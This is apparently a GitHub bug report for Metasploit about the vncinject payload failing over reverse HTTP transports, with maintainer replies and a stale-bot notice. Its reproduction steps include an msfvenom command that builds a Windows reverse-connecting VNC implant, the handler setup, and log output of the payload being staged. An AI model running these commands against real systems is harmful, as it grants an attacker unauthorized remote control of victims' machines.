vncinject does not work with reverse_*http* #9720
Comments
|
VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application. |
busterb
changed the title
|
Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/ |
|
Hi! This issue has been left open with no activity for a while now. We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request. |
github-actions
bot
added
the
Stale
dwelch-r7
added
confirmed
Steps to reproduce
msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/vncinject/reverse_http
set lhost "IP OF METASPLOIT machine"
Running the vnchttp.exe on windows 2012 machine with connectivity to the metaploit machine
Here are the results:
msf exploit(handler) > [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ...
[] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900...
[] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started.
[] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer.
[*] VNC connection closed.
/usr/bin/vncviewer: VNC server closed connection
What should happen?
VNC session should be open.
What happens instead?
VNC session allways break cause of server error.
Metasploit version
Framework: 4.16.2-dev
Console : 4.16.2-dev
I installed Metasploit with:
The text was updated successfully, but these errors were encountered: